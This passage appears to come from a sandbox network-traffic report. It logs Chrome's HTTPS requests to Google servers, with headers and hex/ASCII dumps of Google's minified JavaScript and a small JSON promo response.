                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32
                                                                                                                                                                                                                                                                                        Data Ascii: role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31
                                                                                                                                                                                                                                                                                        Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65
                                                                                                                                                                                                                                                                                        Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700291,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33
                                                                                                                                                                                                                                                                                        Data Ascii: 1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC920INData Raw: 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c
                                                                                                                                                                                                                                                                                        Data Ascii: a\u003da.i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC365INData Raw: 31 36 36 0d 0a 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 74 65 2c 78 65 2c 70 65 3b 5f 2e 72 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 70 65 28 5f 2e 71 65 28 61 29 29 3a 6e 65 7c 7c 28 6e 65 5c 75 30 30 33 64 6e 65 77 20 70 65 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67
                                                                                                                                                                                                                                                                                        Data Ascii: 166-]+:|[^:/?#]*(?:[/?#]|$))/i;var te,xe,pe;_.re\u003dfunction(a){return a?new pe(_.qe(a)):ne||(ne\u003dnew pe)};_.se\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db||document;c.g
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC1378INData Raw: 38 30 30 30 0d 0a 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 8000?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        3192.168.2.449734142.250.186.1004437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Version: 693618659
                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:07 GMT
                                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        4192.168.2.449744172.217.16.2064437788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC741OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: apis.google.com
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                        X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC915INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                                                                        Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                                                                        Content-Length: 117949
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        Server: sffe
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 00:32:18 GMT
                                                                                                                                                                                                                                                                                        Expires: Tue, 11 Nov 2025 00:32:18 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                        Age: 54231
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC463INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e
                                                                                                                                                                                                                                                                                        Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75
                                                                                                                                                                                                                                                                                        Data Ascii: totype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retu
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73
                                                                                                                                                                                                                                                                                        Data Ascii: ar b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.as
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74
                                                                                                                                                                                                                                                                                        Data Ascii: function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l||(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63
                                                                                                                                                                                                                                                                                        Data Ascii: promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=func
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f
                                                                                                                                                                                                                                                                                        Data Ascii: or("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c|0,d.length));fo
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:09 UTC1378INData Raw: 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74
                                                                                                                                                                                                                                                                                        Data Ascii: r h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return t
